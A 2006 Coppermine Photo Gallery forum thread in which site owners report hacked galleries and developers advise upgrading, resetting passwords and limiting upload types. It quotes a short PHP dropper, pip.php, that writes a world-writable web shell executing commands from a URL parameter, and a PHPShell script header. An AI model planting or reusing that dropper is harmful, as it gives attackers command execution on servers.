Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: Site hacked..  (Read 4972 times)

0 Members and 1 Guest are viewing this topic.

togi

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 61
Site hacked..
« on: February 27, 2006, 01:47:46 am »

My site was hacked once.. upgraded it to a newer version and it seems like I am getting stange visitors..
I have limited uploads to images and txt/pdf and movies..

How do i stop these hacker from coming back?

here is one of the files uploaded.. title is pip.php

<?php
     $suntzu=fopen("shell.php","w");
     fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
     fclose($suntzu);
     chmod("shell.php",777);
?>


there was another guy today.. but deleted it without saving..
he uploaded a imagename.php.jpg ... i found it fishy so i deleted it..

would like to hear meaasures others have taken to make the site free from
hackers.. thank you very much!

« Last Edit: February 27, 2006, 08:12:38 am by GauGau »
Logged

kegobeer

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 4637
  • Beer - it does a body good!
    • The Kazebeer Family Website
Re: Site hacked..
« Reply #1 on: February 27, 2006, 03:26:16 am »

Here are some ideas:

Don't allow visitors to upload files.  Verify all of your members prior to allowing them to upload files.  Only allow jpeg files.
Logged
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

togi

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 61
Re: Site hacked..
« Reply #2 on: February 27, 2006, 04:34:13 am »

Thanks for the tip.. i set the movie, audio and document type to "none" is that ok?  i set images to jpg/gif/tif
Logged

Abbas Ali

  • Administrator
  • Coppermine addict
  • *****
  • Country: in
  • Offline Offline
  • Gender: Male
  • Posts: 2165
  • Spread the PHP Web
    • Ranium Systems
Re: Site hacked..
« Reply #3 on: February 27, 2006, 07:44:21 am »

Upgrade to 1.4.4 asap. The above file "pip.php" which was uploaded to your site is because of recent vulnaribility found in cpg. The hacker must have extracted your database password and other details. Please change them asap.
Logged
Chief Geek at Ranium Systems

Fudgemaster

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 45
    • Trackdays, Car shows, Nature and some misc photos
Re: Site hacked..
« Reply #4 on: February 27, 2006, 02:19:51 pm »

I got a new user also, uploaded 2 files.
123.php.php.rar and 123.php.php7.rar

Both are php files..

Code: [Select]
*****************************************************************************************
*                           PHPSHELL.PHP  BY MACKER     30 March 2003                   *
*****************************************************************************************
*                                                                                       * 
*   Welcome to Macker's PHPShell script...                                              *
*   This script will allow you to browse webservers etc...                              *
*   Just copy the file to your directory and open it in your Internet Browser.          *
*                                                                                       *
*   The webserver should support PHP...                                                 *
*                                                                                       *
*   You can modify the script if you want, but please send me a copy to:                * 
*                               DRAZZ01@HOTMAIL.COM                                     *
*****************************************************************************************

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !!
!!                Sites or even the server... You are responsible for your own deeds.  !!
!!                The admin of your webserver should always know you are using this    !!
!!                script.                                                              !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/

Damnit. and all because of me. I upgraded to 1.4.3 and didn't realize the upload permissions get reseted in upgrade =(
The remotethingamajigger update is applied now and passwords are renewed.

Gotta go thru every dir etc. for crap  :'(
Logged
--
It's an insane world.. But I'm proud to be a part of it.

Stramm

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: 00
  • Offline Offline
  • Gender: Male
  • Posts: 6006
    • Bettis Wollwelt
Re: Site hacked..
« Reply #5 on: February 27, 2006, 02:29:17 pm »

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Fudgemaster

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 45
    • Trackdays, Car shows, Nature and some misc photos
Re: Site hacked..
« Reply #6 on: February 27, 2006, 02:36:07 pm »

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Oh thank You. that was a relief to hear.
I almost soiled myself at work today when I noticed that extra crap on my
site because I've never allowed anyone else than myself to upload anything.
Logged
--
It's an insane world.. But I'm proud to be a part of it.
Pages: [1]   Go Up
 

Page created in 0.027 seconds with 20 queries.